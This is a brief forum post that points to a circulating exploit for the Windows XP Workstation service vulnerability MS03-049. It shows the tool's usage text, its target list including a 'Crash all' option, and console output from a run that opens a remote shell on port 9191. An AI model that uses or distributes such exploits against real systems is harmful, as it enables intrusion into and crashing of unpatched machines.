there is an exploit floating arround for xp
[code]
d:\>rpc_wks_bo.exe
WKS service remote exploit MS03-049 by fiNis (fiNis[at]bk[dot]ru), ver:0.1.1
-------------------------------------------------------------------
Usage: rpc_wks_bo.exe [-ht]
-h <IP> : Target IP
-t <Type> : Target type (-t0 for a list)
d:\>rpc_wks_bo.exe -t0
Possible targets are:
============================
1) Window XP Pro + SP0 [Rus]
2) Window XP Pro + SP1 [Rus]
3) Crash all
d:\>rpc_wks_bo.exe -h localhost -t1
[+] Prepare exploit string
[+] Sleep at 2s ...
[+] Setting up IPC$ session...
[+] IPC$ session setup successfully!
[+] Sending exploit ...
[+] Initialize WSAStartup - OK
[+] Socket initialized - OK
[+] Try connecting to localhost:9191 ...[*] Connected to shell at localhost:9191
hope it helps guys
Reply With Quote